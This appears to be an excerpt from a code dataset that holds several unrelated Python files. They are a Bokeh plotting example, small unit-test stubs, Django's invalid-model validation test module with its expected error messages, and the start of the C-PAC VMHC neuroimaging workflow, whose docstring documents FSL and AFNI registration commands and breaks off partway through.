code
stringlengths 1
199k
|
|---|
from .. utils import TranspileTestCase, BuiltinFunctionTestCase
class InputTests(TranspileTestCase):
pass
|
from bokeh.plotting import figure, show
x = [1, 2, 3, 4, 5]
y = [6, 7, 2, 4, 5]
p = figure(title="Simple line example", x_axis_label="x", y_axis_label="y")
p.line(x, y, legend_label="Temp.", line_width=2)
show(p)
|
from Chip import OpCodeDefinitions
from Tests.OpCodeTests.OpCodeTestBase import OpCodeTestBase
class TestRtiOpCode(OpCodeTestBase):
def test_execute_rti_implied_command_calls_and_method(self):
self.assert_opcode_execution(OpCodeDefinitions.rti_implied_command, self.target.get_rti_command_executed)
|
"""
26. Invalid models
This example exists purely to point out errors in models.
"""
from __future__ import unicode_literals
from django.db import connection, models
class FieldErrors(models.Model):
charfield = models.CharField()
charfield2 = models.CharField(max_length=-1)
charfield3 = models.CharField(max_length="bad")
decimalfield = models.DecimalField()
decimalfield2 = models.DecimalField(max_digits=-1, decimal_places=-1)
decimalfield3 = models.DecimalField(max_digits="bad", decimal_places="bad")
decimalfield4 = models.DecimalField(max_digits=9, decimal_places=10)
decimalfield5 = models.DecimalField(max_digits=10, decimal_places=10)
filefield = models.FileField()
choices = models.CharField(max_length=10, choices='bad')
choices2 = models.CharField(max_length=10, choices=[(1, 2, 3), (1, 2, 3)])
index = models.CharField(max_length=10, db_index='bad')
field_ = models.CharField(max_length=10)
nullbool = models.BooleanField(null=True)
class Target(models.Model):
tgt_safe = models.CharField(max_length=10)
clash1 = models.CharField(max_length=10)
clash2 = models.CharField(max_length=10)
clash1_set = models.CharField(max_length=10)
class Clash1(models.Model):
src_safe = models.CharField(max_length=10)
foreign = models.ForeignKey(Target)
m2m = models.ManyToManyField(Target)
class Clash2(models.Model):
src_safe = models.CharField(max_length=10)
foreign_1 = models.ForeignKey(Target, related_name='id')
foreign_2 = models.ForeignKey(Target, related_name='src_safe')
m2m_1 = models.ManyToManyField(Target, related_name='id')
m2m_2 = models.ManyToManyField(Target, related_name='src_safe')
class Target2(models.Model):
clash3 = models.CharField(max_length=10)
foreign_tgt = models.ForeignKey(Target)
clashforeign_set = models.ForeignKey(Target)
m2m_tgt = models.ManyToManyField(Target)
clashm2m_set = models.ManyToManyField(Target)
class Clash3(models.Model):
src_safe = models.CharField(max_length=10)
foreign_1 = models.ForeignKey(Target2, related_name='foreign_tgt')
foreign_2 = models.ForeignKey(Target2, related_name='m2m_tgt')
m2m_1 = models.ManyToManyField(Target2, related_name='foreign_tgt')
m2m_2 = models.ManyToManyField(Target2, related_name='m2m_tgt')
class ClashForeign(models.Model):
foreign = models.ForeignKey(Target2)
class ClashM2M(models.Model):
m2m = models.ManyToManyField(Target2)
class SelfClashForeign(models.Model):
src_safe = models.CharField(max_length=10)
selfclashforeign = models.CharField(max_length=10)
selfclashforeign_set = models.ForeignKey("SelfClashForeign")
foreign_1 = models.ForeignKey("SelfClashForeign", related_name='id')
foreign_2 = models.ForeignKey("SelfClashForeign", related_name='src_safe')
class ValidM2M(models.Model):
src_safe = models.CharField(max_length=10)
validm2m = models.CharField(max_length=10)
# M2M fields are symmetrical by default. Symmetrical M2M fields
# on self don't require a related accessor, so many potential
# clashes are avoided.
validm2m_set = models.ManyToManyField("self")
m2m_1 = models.ManyToManyField("self", related_name='id')
m2m_2 = models.ManyToManyField("self", related_name='src_safe')
m2m_3 = models.ManyToManyField('self')
m2m_4 = models.ManyToManyField('self')
class SelfClashM2M(models.Model):
src_safe = models.CharField(max_length=10)
selfclashm2m = models.CharField(max_length=10)
# Non-symmetrical M2M fields _do_ have related accessors, so
# there is potential for clashes.
selfclashm2m_set = models.ManyToManyField("self", symmetrical=False)
m2m_1 = models.ManyToManyField("self", related_name='id', symmetrical=False)
m2m_2 = models.ManyToManyField("self", related_name='src_safe', symmetrical=False)
m2m_3 = models.ManyToManyField('self', symmetrical=False)
m2m_4 = models.ManyToManyField('self', symmetrical=False)
class Model(models.Model):
"But it's valid to call a model Model."
year = models.PositiveIntegerField() # 1960
make = models.CharField(max_length=10) # Aston Martin
name = models.CharField(max_length=10) # DB 4 GT
class Car(models.Model):
colour = models.CharField(max_length=5)
model = models.ForeignKey(Model)
class MissingRelations(models.Model):
rel1 = models.ForeignKey("Rel1")
rel2 = models.ManyToManyField("Rel2")
class MissingManualM2MModel(models.Model):
name = models.CharField(max_length=5)
missing_m2m = models.ManyToManyField(Model, through="MissingM2MModel")
class Person(models.Model):
name = models.CharField(max_length=5)
class Group(models.Model):
name = models.CharField(max_length=5)
primary = models.ManyToManyField(Person, through="Membership", related_name="primary")
secondary = models.ManyToManyField(Person, through="Membership", related_name="secondary")
tertiary = models.ManyToManyField(Person, through="RelationshipDoubleFK", related_name="tertiary")
class GroupTwo(models.Model):
name = models.CharField(max_length=5)
primary = models.ManyToManyField(Person, through="Membership")
secondary = models.ManyToManyField(Group, through="MembershipMissingFK")
class Membership(models.Model):
person = models.ForeignKey(Person)
group = models.ForeignKey(Group)
not_default_or_null = models.CharField(max_length=5)
class MembershipMissingFK(models.Model):
person = models.ForeignKey(Person)
class PersonSelfRefM2M(models.Model):
name = models.CharField(max_length=5)
friends = models.ManyToManyField('self', through="Relationship")
too_many_friends = models.ManyToManyField('self', through="RelationshipTripleFK")
class PersonSelfRefM2MExplicit(models.Model):
name = models.CharField(max_length=5)
friends = models.ManyToManyField('self', through="ExplicitRelationship", symmetrical=True)
class Relationship(models.Model):
first = models.ForeignKey(PersonSelfRefM2M, related_name="rel_from_set")
second = models.ForeignKey(PersonSelfRefM2M, related_name="rel_to_set")
date_added = models.DateTimeField()
class ExplicitRelationship(models.Model):
first = models.ForeignKey(PersonSelfRefM2MExplicit, related_name="rel_from_set")
second = models.ForeignKey(PersonSelfRefM2MExplicit, related_name="rel_to_set")
date_added = models.DateTimeField()
class RelationshipTripleFK(models.Model):
first = models.ForeignKey(PersonSelfRefM2M, related_name="rel_from_set_2")
second = models.ForeignKey(PersonSelfRefM2M, related_name="rel_to_set_2")
third = models.ForeignKey(PersonSelfRefM2M, related_name="too_many_by_far")
date_added = models.DateTimeField()
class RelationshipDoubleFK(models.Model):
first = models.ForeignKey(Person, related_name="first_related_name")
second = models.ForeignKey(Person, related_name="second_related_name")
third = models.ForeignKey(Group, related_name="rel_to_set")
date_added = models.DateTimeField()
class AbstractModel(models.Model):
name = models.CharField(max_length=10)
class Meta:
abstract = True
class AbstractRelationModel(models.Model):
fk1 = models.ForeignKey('AbstractModel')
fk2 = models.ManyToManyField('AbstractModel')
class UniqueM2M(models.Model):
""" Model to test for unique ManyToManyFields, which are invalid. """
unique_people = models.ManyToManyField(Person, unique=True)
class NonUniqueFKTarget1(models.Model):
""" Model to test for non-unique FK target in yet-to-be-defined model: expect an error """
tgt = models.ForeignKey('FKTarget', to_field='bad')
class UniqueFKTarget1(models.Model):
""" Model to test for unique FK target in yet-to-be-defined model: expect no error """
tgt = models.ForeignKey('FKTarget', to_field='good')
class FKTarget(models.Model):
bad = models.IntegerField()
good = models.IntegerField(unique=True)
class NonUniqueFKTarget2(models.Model):
""" Model to test for non-unique FK target in previously seen model: expect an error """
tgt = models.ForeignKey(FKTarget, to_field='bad')
class UniqueFKTarget2(models.Model):
""" Model to test for unique FK target in previously seen model: expect no error """
tgt = models.ForeignKey(FKTarget, to_field='good')
class NonExistingOrderingWithSingleUnderscore(models.Model):
class Meta:
ordering = ("does_not_exist",)
class InvalidSetNull(models.Model):
fk = models.ForeignKey('self', on_delete=models.SET_NULL)
class InvalidSetDefault(models.Model):
fk = models.ForeignKey('self', on_delete=models.SET_DEFAULT)
class UnicodeForeignKeys(models.Model):
"""Foreign keys which can translate to ascii should be OK, but fail if
they're not."""
good = models.ForeignKey('FKTarget')
also_good = models.ManyToManyField('FKTarget', related_name='unicode2')
# In Python 3 this should become legal, but currently causes unicode errors
# when adding the errors in core/management/validation.py
#bad = models.ForeignKey('★')
class PrimaryKeyNull(models.Model):
my_pk_field = models.IntegerField(primary_key=True, null=True)
class OrderByPKModel(models.Model):
"""
Model to test that ordering by pk passes validation.
Refs #8291
"""
name = models.CharField(max_length=100, blank=True)
class Meta:
ordering = ('pk',)
class SwappableModel(models.Model):
"""A model that can be, but isn't swapped out.
References to this model *shoudln't* raise any validation error.
"""
name = models.CharField(max_length=100)
class Meta:
swappable = 'TEST_SWAPPABLE_MODEL'
class SwappedModel(models.Model):
"""A model that is swapped out.
References to this model *should* raise a validation error.
Requires TEST_SWAPPED_MODEL to be defined in the test environment;
this is guaranteed by the test runner using @override_settings.
"""
name = models.CharField(max_length=100)
class Meta:
swappable = 'TEST_SWAPPED_MODEL'
class BadSwappableValue(models.Model):
"""A model that can be swapped out; during testing, the swappable
value is not of the format app.model
"""
name = models.CharField(max_length=100)
class Meta:
swappable = 'TEST_SWAPPED_MODEL_BAD_VALUE'
class BadSwappableModel(models.Model):
"""A model that can be swapped out; during testing, the swappable
value references an unknown model.
"""
name = models.CharField(max_length=100)
class Meta:
swappable = 'TEST_SWAPPED_MODEL_BAD_MODEL'
class HardReferenceModel(models.Model):
fk_1 = models.ForeignKey(SwappableModel, related_name='fk_hardref1')
fk_2 = models.ForeignKey('invalid_models.SwappableModel', related_name='fk_hardref2')
fk_3 = models.ForeignKey(SwappedModel, related_name='fk_hardref3')
fk_4 = models.ForeignKey('invalid_models.SwappedModel', related_name='fk_hardref4')
m2m_1 = models.ManyToManyField(SwappableModel, related_name='m2m_hardref1')
m2m_2 = models.ManyToManyField('invalid_models.SwappableModel', related_name='m2m_hardref2')
m2m_3 = models.ManyToManyField(SwappedModel, related_name='m2m_hardref3')
m2m_4 = models.ManyToManyField('invalid_models.SwappedModel', related_name='m2m_hardref4')
model_errors = """invalid_models.fielderrors: "charfield": CharFields require a "max_length" attribute that is a positive integer.
invalid_models.fielderrors: "charfield2": CharFields require a "max_length" attribute that is a positive integer.
invalid_models.fielderrors: "charfield3": CharFields require a "max_length" attribute that is a positive integer.
invalid_models.fielderrors: "decimalfield": DecimalFields require a "decimal_places" attribute that is a non-negative integer.
invalid_models.fielderrors: "decimalfield": DecimalFields require a "max_digits" attribute that is a positive integer.
invalid_models.fielderrors: "decimalfield2": DecimalFields require a "decimal_places" attribute that is a non-negative integer.
invalid_models.fielderrors: "decimalfield2": DecimalFields require a "max_digits" attribute that is a positive integer.
invalid_models.fielderrors: "decimalfield3": DecimalFields require a "decimal_places" attribute that is a non-negative integer.
invalid_models.fielderrors: "decimalfield3": DecimalFields require a "max_digits" attribute that is a positive integer.
invalid_models.fielderrors: "decimalfield4": DecimalFields require a "max_digits" attribute value that is greater than or equal to the value of the "decimal_places" attribute.
invalid_models.fielderrors: "filefield": FileFields require an "upload_to" attribute.
invalid_models.fielderrors: "choices": "choices" should be iterable (e.g., a tuple or list).
invalid_models.fielderrors: "choices2": "choices" should be a sequence of two-tuples.
invalid_models.fielderrors: "choices2": "choices" should be a sequence of two-tuples.
invalid_models.fielderrors: "index": "db_index" should be either None, True or False.
invalid_models.fielderrors: "field_": Field names cannot end with underscores, because this would lead to ambiguous queryset filters.
invalid_models.fielderrors: "nullbool": BooleanFields do not accept null values. Use a NullBooleanField instead.
invalid_models.clash1: Accessor for field 'foreign' clashes with field 'Target.clash1_set'. Add a related_name argument to the definition for 'foreign'.
invalid_models.clash1: Accessor for field 'foreign' clashes with related m2m field 'Target.clash1_set'. Add a related_name argument to the definition for 'foreign'.
invalid_models.clash1: Reverse query name for field 'foreign' clashes with field 'Target.clash1'. Add a related_name argument to the definition for 'foreign'.
invalid_models.clash1: Accessor for m2m field 'm2m' clashes with field 'Target.clash1_set'. Add a related_name argument to the definition for 'm2m'.
invalid_models.clash1: Accessor for m2m field 'm2m' clashes with related field 'Target.clash1_set'. Add a related_name argument to the definition for 'm2m'.
invalid_models.clash1: Reverse query name for m2m field 'm2m' clashes with field 'Target.clash1'. Add a related_name argument to the definition for 'm2m'.
invalid_models.clash2: Accessor for field 'foreign_1' clashes with field 'Target.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash2: Accessor for field 'foreign_1' clashes with related m2m field 'Target.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash2: Reverse query name for field 'foreign_1' clashes with field 'Target.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash2: Reverse query name for field 'foreign_1' clashes with related m2m field 'Target.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash2: Accessor for field 'foreign_2' clashes with related m2m field 'Target.src_safe'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash2: Reverse query name for field 'foreign_2' clashes with related m2m field 'Target.src_safe'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash2: Accessor for m2m field 'm2m_1' clashes with field 'Target.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash2: Accessor for m2m field 'm2m_1' clashes with related field 'Target.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash2: Reverse query name for m2m field 'm2m_1' clashes with field 'Target.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash2: Reverse query name for m2m field 'm2m_1' clashes with related field 'Target.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash2: Accessor for m2m field 'm2m_2' clashes with related field 'Target.src_safe'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash2: Reverse query name for m2m field 'm2m_2' clashes with related field 'Target.src_safe'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash3: Accessor for field 'foreign_1' clashes with field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash3: Accessor for field 'foreign_1' clashes with related m2m field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash3: Reverse query name for field 'foreign_1' clashes with field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash3: Reverse query name for field 'foreign_1' clashes with related m2m field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.clash3: Accessor for field 'foreign_2' clashes with m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash3: Accessor for field 'foreign_2' clashes with related m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash3: Reverse query name for field 'foreign_2' clashes with m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash3: Reverse query name for field 'foreign_2' clashes with related m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.clash3: Accessor for m2m field 'm2m_1' clashes with field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash3: Accessor for m2m field 'm2m_1' clashes with related field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash3: Reverse query name for m2m field 'm2m_1' clashes with field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash3: Reverse query name for m2m field 'm2m_1' clashes with related field 'Target2.foreign_tgt'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.clash3: Accessor for m2m field 'm2m_2' clashes with m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash3: Accessor for m2m field 'm2m_2' clashes with related field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash3: Reverse query name for m2m field 'm2m_2' clashes with m2m field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clash3: Reverse query name for m2m field 'm2m_2' clashes with related field 'Target2.m2m_tgt'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.clashforeign: Accessor for field 'foreign' clashes with field 'Target2.clashforeign_set'. Add a related_name argument to the definition for 'foreign'.
invalid_models.clashm2m: Accessor for m2m field 'm2m' clashes with m2m field 'Target2.clashm2m_set'. Add a related_name argument to the definition for 'm2m'.
invalid_models.target2: Accessor for field 'foreign_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'foreign_tgt'.
invalid_models.target2: Accessor for field 'foreign_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'foreign_tgt'.
invalid_models.target2: Accessor for field 'foreign_tgt' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'foreign_tgt'.
invalid_models.target2: Accessor for field 'clashforeign_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashforeign_set'.
invalid_models.target2: Accessor for field 'clashforeign_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashforeign_set'.
invalid_models.target2: Accessor for field 'clashforeign_set' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'clashforeign_set'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'm2m_tgt' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'm2m_tgt'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.target2: Accessor for m2m field 'clashm2m_set' clashes with related m2m field 'Target.target2_set'. Add a related_name argument to the definition for 'clashm2m_set'.
invalid_models.selfclashforeign: Accessor for field 'selfclashforeign_set' clashes with field 'SelfClashForeign.selfclashforeign_set'. Add a related_name argument to the definition for 'selfclashforeign_set'.
invalid_models.selfclashforeign: Reverse query name for field 'selfclashforeign_set' clashes with field 'SelfClashForeign.selfclashforeign'. Add a related_name argument to the definition for 'selfclashforeign_set'.
invalid_models.selfclashforeign: Accessor for field 'foreign_1' clashes with field 'SelfClashForeign.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.selfclashforeign: Reverse query name for field 'foreign_1' clashes with field 'SelfClashForeign.id'. Add a related_name argument to the definition for 'foreign_1'.
invalid_models.selfclashforeign: Accessor for field 'foreign_2' clashes with field 'SelfClashForeign.src_safe'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.selfclashforeign: Reverse query name for field 'foreign_2' clashes with field 'SelfClashForeign.src_safe'. Add a related_name argument to the definition for 'foreign_2'.
invalid_models.selfclashm2m: Accessor for m2m field 'selfclashm2m_set' clashes with m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'selfclashm2m_set'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'selfclashm2m_set' clashes with field 'SelfClashM2M.selfclashm2m'. Add a related_name argument to the definition for 'selfclashm2m_set'.
invalid_models.selfclashm2m: Accessor for m2m field 'selfclashm2m_set' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'selfclashm2m_set'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_1' clashes with field 'SelfClashM2M.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_2' clashes with field 'SelfClashM2M.src_safe'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'm2m_1' clashes with field 'SelfClashM2M.id'. Add a related_name argument to the definition for 'm2m_1'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'm2m_2' clashes with field 'SelfClashM2M.src_safe'. Add a related_name argument to the definition for 'm2m_2'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_3' clashes with m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_3'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_3' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_3'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_3' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_3'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_4' clashes with m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_4'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_4' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_4'.
invalid_models.selfclashm2m: Accessor for m2m field 'm2m_4' clashes with related m2m field 'SelfClashM2M.selfclashm2m_set'. Add a related_name argument to the definition for 'm2m_4'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'm2m_3' clashes with field 'SelfClashM2M.selfclashm2m'. Add a related_name argument to the definition for 'm2m_3'.
invalid_models.selfclashm2m: Reverse query name for m2m field 'm2m_4' clashes with field 'SelfClashM2M.selfclashm2m'. Add a related_name argument to the definition for 'm2m_4'.
invalid_models.missingrelations: 'rel1' has a relation with model Rel1, which has either not been installed or is abstract.
invalid_models.missingrelations: 'rel2' has an m2m relation with model Rel2, which has either not been installed or is abstract.
invalid_models.grouptwo: 'primary' is a manually-defined m2m relation through model Membership, which does not have foreign keys to Person and GroupTwo
invalid_models.grouptwo: 'secondary' is a manually-defined m2m relation through model MembershipMissingFK, which does not have foreign keys to Group and GroupTwo
invalid_models.missingmanualm2mmodel: 'missing_m2m' specifies an m2m relation through model MissingM2MModel, which has not been installed
invalid_models.group: The model Group has two manually-defined m2m relations through the model Membership, which is not permitted. Please consider using an extra field on your intermediary model instead.
invalid_models.group: Intermediary model RelationshipDoubleFK has more than one foreign key to Person, which is ambiguous and is not permitted.
invalid_models.personselfrefm2m: Many-to-many fields with intermediate tables cannot be symmetrical.
invalid_models.personselfrefm2m: Intermediary model RelationshipTripleFK has more than two foreign keys to PersonSelfRefM2M, which is ambiguous and is not permitted.
invalid_models.personselfrefm2mexplicit: Many-to-many fields with intermediate tables cannot be symmetrical.
invalid_models.abstractrelationmodel: 'fk1' has a relation with model AbstractModel, which has either not been installed or is abstract.
invalid_models.abstractrelationmodel: 'fk2' has an m2m relation with model AbstractModel, which has either not been installed or is abstract.
invalid_models.uniquem2m: ManyToManyFields cannot be unique. Remove the unique argument on 'unique_people'.
invalid_models.nonuniquefktarget1: Field 'bad' under model 'FKTarget' must have a unique=True constraint.
invalid_models.nonuniquefktarget2: Field 'bad' under model 'FKTarget' must have a unique=True constraint.
invalid_models.nonexistingorderingwithsingleunderscore: "ordering" refers to "does_not_exist", a field that doesn't exist.
invalid_models.invalidsetnull: 'fk' specifies on_delete=SET_NULL, but cannot be null.
invalid_models.invalidsetdefault: 'fk' specifies on_delete=SET_DEFAULT, but has no default value.
invalid_models.hardreferencemodel: 'fk_3' defines a relation with the model 'invalid_models.SwappedModel', which has been swapped out. Update the relation to point at settings.TEST_SWAPPED_MODEL.
invalid_models.hardreferencemodel: 'fk_4' defines a relation with the model 'invalid_models.SwappedModel', which has been swapped out. Update the relation to point at settings.TEST_SWAPPED_MODEL.
invalid_models.hardreferencemodel: 'm2m_3' defines a relation with the model 'invalid_models.SwappedModel', which has been swapped out. Update the relation to point at settings.TEST_SWAPPED_MODEL.
invalid_models.hardreferencemodel: 'm2m_4' defines a relation with the model 'invalid_models.SwappedModel', which has been swapped out. Update the relation to point at settings.TEST_SWAPPED_MODEL.
invalid_models.badswappablevalue: TEST_SWAPPED_MODEL_BAD_VALUE is not of the form 'app_label.app_name'.
invalid_models.badswappablemodel: Model has been swapped out for 'not_an_app.Target' which has not been installed or is abstract.
"""
if not connection.features.interprets_empty_strings_as_nulls:
model_errors += """invalid_models.primarykeynull: "my_pk_field": Primary key fields cannot have null=True.
"""
|
import sys
import os
import commands
import nipype.pipeline.engine as pe
import nipype.algorithms.rapidart as ra
import nipype.interfaces.fsl as fsl
import nipype.interfaces.io as nio
import nipype.interfaces.utility as util
from utils import *
from CPAC.vmhc import *
from nipype.interfaces.afni import preprocess
from CPAC.registration import create_wf_calculate_ants_warp, \
create_wf_c3d_fsl_to_itk, \
create_wf_collect_transforms, \
create_wf_apply_ants_warp
def create_vmhc(use_ants):
"""
Compute the map of brain functional homotopy, the high degree of synchrony in spontaneous activity between geometrically corresponding interhemispheric (i.e., homotopic) regions.
Parameters
----------
None
Returns
-------
vmhc_workflow : workflow
Voxel Mirrored Homotopic Connectivity Analysis Workflow
Notes
-----
`Source <https://github.com/FCP-INDI/C-PAC/blob/master/CPAC/vmhc/vmhc.py>`_
Workflow Inputs::
inputspec.brain : string (existing nifti file)
Anatomical image(without skull)
inputspec.brain_symmetric : string (existing nifti file)
MNI152_T1_2mm_brain_symmetric.nii.gz
inputspec.rest_res_filt : string (existing nifti file)
Band passed Image with nuisance signal regressed out(and optionally scrubbed). Recommended bandpass filter (0.001,0.1) )
inputspec.reorient : string (existing nifti file)
RPI oriented anatomical data
inputspec.example_func2highres_mat : string (existing affine transformation .mat file)
Specifies an affine transform that should be applied to the example_func before non linear warping
inputspec.standard : string (existing nifti file)
MNI152_T1_standard_resolution_brain.nii.gz
inputspec.symm_standard : string (existing nifti file)
MNI152_T1_2mm_symmetric.nii.gz
inputspec.twomm_brain_mask_dil : string (existing nifti file)
MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz
inputspec.config_file_twomm_symmetric : string (existing .cnf file)
T1_2_MNI152_2mm_symmetric.cnf
inputspec.rest_mask : string (existing nifti file)
A mask functional volume(derived by dilation from motion corrected functional volume)
fwhm_input.fwhm : list (float)
For spatial smoothing the Z-transformed correlations in MNI space.
Generally the value of this parameter is 1.5 or 2 times the voxel size of the input Image.
inputspec.mean_functional : string (existing nifti file)
The mean functional image for use in the func-to-anat registration matrix conversion
to ITK (ANTS) format, if the user selects to use ANTS.
Workflow Outputs::
outputspec.highres2symmstandard : string (nifti file)
Linear registration of T1 image to symmetric standard image
outputspec.highres2symmstandard_mat : string (affine transformation .mat file)
An affine transformation .mat file from linear registration and used in non linear registration
outputspec.highres2symmstandard_warp : string (nifti file)
warp file from Non Linear registration of T1 to symmetrical standard brain
outputspec.fnirt_highres2symmstandard : string (nifti file)
Non Linear registration of T1 to symmetrical standard brain
outputspec.highres2symmstandard_jac : string (nifti file)
jacobian determinant image from Non Linear registration of T1 to symmetrical standard brain
outputspec.rest_res_2symmstandard : string (nifti file)
nonlinear registration (func to standard) image
outputspec.VMHC_FWHM_img : string (nifti file)
pearson correlation between res2standard and flipped res2standard
outputspec.VMHC_Z_FWHM_img : string (nifti file)
Fisher Z transform map
outputspec.VMHC_Z_stat_FWHM_img : string (nifti file)
Z statistic map
Order of commands:
- Perform linear registration of Anatomical brain in T1 space to symmetric standard space. For details see `flirt <http://www.fmrib.ox.ac.uk/fsl/flirt/index.html>`_::
flirt
-ref MNI152_T1_2mm_brain_symmetric.nii.gz
-in mprage_brain.nii.gz
-out highres2symmstandard.nii.gz
-omat highres2symmstandard.mat
-cost corratio
-searchcost corratio
-dof 12
-interp trilinear
- Perform nonlinear registration (higres to standard) to symmetric standard brain. For details see `fnirt <http://fsl.fmrib.ox.ac.uk/fsl/fnirt/>`_::
fnirt
--in=head.nii.gz
--aff=highres2symmstandard.mat
--cout=highres2symmstandard_warp.nii.gz
--iout=fnirt_highres2symmstandard.nii.gz
--jout=highres2symmstandard_jac.nii.gz
--config=T1_2_MNI152_2mm_symmetric.cnf
--ref=MNI152_T1_2mm_symmetric.nii.gz
--refmask=MNI152_T1_2mm_brain_mask_symmetric_dil.nii.gz
--warpres=10,10,10
- Perform spatial smoothing on the input functional image(inputspec.rest_res_filt). For details see `PrinciplesSmoothing <http://imaging.mrc-cbu.cam.ac.uk/imaging/PrinciplesSmoothing>`_ `fslmaths <http://www.fmrib.ox.ac.uk/fslcourse/lectures/practicals/intro/index.htm>`_::
fslmaths rest_res_filt.nii.gz
-kernel gauss FWHM/ sqrt(8-ln(2))
-fmean -mas rest_mask.nii.gz
rest_res_filt_FWHM.nii.gz
- Apply nonlinear registration (func to standard). For details see `applywarp <http://www.fmrib.ox.ac.uk/fsl/fnirt/warp_utils.html#applywarp>`_::
applywarp
--ref=MNI152_T1_2mm_symmetric.nii.gz
--in=rest_res_filt_FWHM.nii.gz
--out=rest_res_2symmstandard.nii.gz
--warp=highres2symmstandard_warp.nii.gz
--premat=example_func2highres.mat
- Copy and L/R swap the output of applywarp command (rest_res_2symmstandard.nii.gz). For details see `fslswapdim <http://fsl.fmrib.ox.ac.uk/fsl/fsl4.0/avwutils/index.html>`_::
fslswapdim
rest_res_2symmstandard.nii.gz
-x y z
tmp_LRflipped.nii.gz
- Calculate pearson correlation between rest_res_2symmstandard.nii.gz and flipped rest_res_2symmstandard.nii.gz(tmp_LRflipped.nii.gz). For details see `3dTcorrelate <http://afni.nimh.nih.gov/pub/dist/doc/program_help/3dTcorrelate.html>`_::
3dTcorrelate
-pearson
-polort -1
-prefix VMHC_FWHM.nii.gz
rest_res_2symmstandard.nii.gz
tmp_LRflipped.nii.gz
